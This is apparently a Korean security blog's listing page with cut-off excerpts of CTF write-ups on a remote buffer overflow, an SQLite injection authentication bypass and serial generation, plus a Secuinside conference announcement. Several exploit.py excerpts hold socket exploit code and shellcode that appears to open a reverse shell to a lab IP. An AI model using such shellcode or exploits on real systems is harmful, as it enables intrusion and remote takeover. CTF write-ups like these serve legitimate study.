Category : Pwnables * file Summary : simple remote buffer overflow Binary Info. [pwn3r@localhost rr200]$ file rr200 rr200: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked (uses shared libs), stripped main함수에서는 daemonize를 시킨뒤 접속하는 client에게 client_callback함수를 실행시켜준다.(함수명은 임의로 지칭한것이다.) 우선 서버에 접속해본다. [pwn3r@localhost rr200]$ nc 192.168.123.134 9999 Hans Brix? Oh no! ..
View All
Category : Revering * file Summary : bypass authentication on ELF binary by sql injection Binary info. [retro300@localhost ~]$ file retro300 retro300: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped [retro300@localhost ~]$ file auth.db auth.db: SQLite 3.x database int main() { int sock_fd; sock_fd = sock_init(word..
exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 9999 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 1127 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" + \ "\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4..
Category : Pwnables * file Summary : overwring max length of recving data exploit.py #!/usr/bin/python from socket import * import time def pack(data): res = "" for i in range(0,4): res = res + chr(data % 0x100) data = data / 0x100 return res HOST = "192.168.123.129" PORT = 3555 SHELLCODE = \ "\x68\xc0\xa8\x7b\x83\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0" + \ "\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\..
Category : Coding , Reverse engineering * binary Summary : generate serial [pwn3r@localhost ~]$ nc 192.168.0.13 8888 ZsIdTLcuTNYdJXa pwn3r Invalid router. Routing failed :( [pwn3r@localhost ~]$ nc 192.168.0.13 8888 ZxBSKUqrwwYqezO pwn3r Time out :( [pwn3r@localhost ~]$ nc 192.168.0.13 8888 KOkIhGSyESyOWfW aaaaaaaaaaaaaaa WAN ssl Your key is wrong :( exploit.py #!/usr/bin/python from socket impor..
연합해킹그룹인 h4ru 와 고려대학교 정보보호대학원이 공동으로 주관하는 1회 secuinside conferense가 개최되네요. 행사의의 일부로 CTF 예선 / 본선이 진행되며 , 본선은 Conferense 당일 오프라인으로 진행됩니다. (안타깝게도 예선날짜와 시험날짜와 정확히 같네요 :) ) 1위 상금은 무려 3,000만원 ! 통큰상금이네요 ㅎㅎ 행사는 멘토링프로그램과 컨퍼런스가 진행되는데 , 멘토링 프로그램은 뭔지 아직 잘모르겠지만 컨퍼런스는 역시 국내/외 유명 해커분들의 흥미로운 발표를 들을 수 있습니다. 처음 진행되는 컨퍼런스이니만큼 정말 기대되네요. 꼭 참가해봐야겠습니다.ㅎㅎ URL : http://secuinside.com/secuinside.html